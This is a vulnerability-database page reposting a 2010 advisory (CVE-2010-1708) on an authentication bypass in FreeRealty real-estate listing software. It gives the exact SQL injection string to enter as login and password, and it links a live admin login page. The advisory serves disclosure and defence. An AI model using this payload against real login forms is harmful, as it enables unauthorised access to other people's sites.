FreeRealty remote SQL injection

2010-04-28 / 2010-04-29
Credit: Sid3^effects
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1708
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Authentication bypass in FreeRealty(Free Real Estate Listing Software) # Date: 27-apr-2010 # Author: Sid3^effects # Software Link: N/a # CVE : [] # Code : [] ______________________________________________________________________________ Authentication bypass in FreeRealty Vendor:http://freerealty.rwcinc.net/ ___________________________Author:Sid3^effects_________________________________ Description : Free Realty is primarily designed for real estate agents and offices to list properties on the internet. With Free Realty the end user does not need to be fluent in web page design. script cost :Free --------------------------------------------------------------------------- * Authentication bypass: The following script has authentication bypass. use ' or 1=1 or ''=' in both login and password. DEMO :http://freerealty.rwcinc.net/demo/agentadmin.php ShoutZ : ------- ---Indian Cyber warriors--Andhra hackers-- Greetz : -------- ---*L0rd rusAd&#234;r*---d4rk-blu&#65533;reg; [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--

References:

http://xforce.iss.net/xforce/xfdb/58193
http://www.securityfocus.com/bid/39712
http://www.exploit-db.com/exploits/12411
http://packetstormsecurity.org/1004-exploits/freerealty-sql.txt


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top